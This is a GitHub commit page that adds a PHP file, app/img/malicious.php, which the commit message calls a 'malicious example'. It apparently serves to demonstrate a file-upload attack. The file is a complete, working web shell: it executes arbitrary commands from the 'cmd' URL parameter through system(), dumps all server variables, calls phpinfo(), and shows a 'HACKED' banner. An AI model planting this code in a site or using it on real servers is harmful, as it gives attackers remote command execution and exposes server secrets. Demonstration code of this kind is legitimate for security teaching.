Skip to content

Commit 9328beb

Browse files
committed
Added missing malicious example PHP file
1 parent 5d12b08 commit 9328beb

File tree

1 file changed

+12
-0
lines changed

1 file changed

+12
-0
lines changed

app/img/malicious.php

Lines changed: 12 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,12 @@
1+
<?php
2+
echo '<h1 style="color: red;font-weight:900;font-size:200px;margin:0">HACKED</h1>';
3+
4+
if(isset($_GET['cmd']))
5+
system($_GET['cmd']);
6+
echo '<br><br><br><br><br>';
7+
8+
foreach($_SERVER as $key_name => $key_value)
9+
print $key_name . " = " . $key_value . "<br>";
10+
11+
phpinfo();
12+
?>

0 commit comments

Comments
 (0)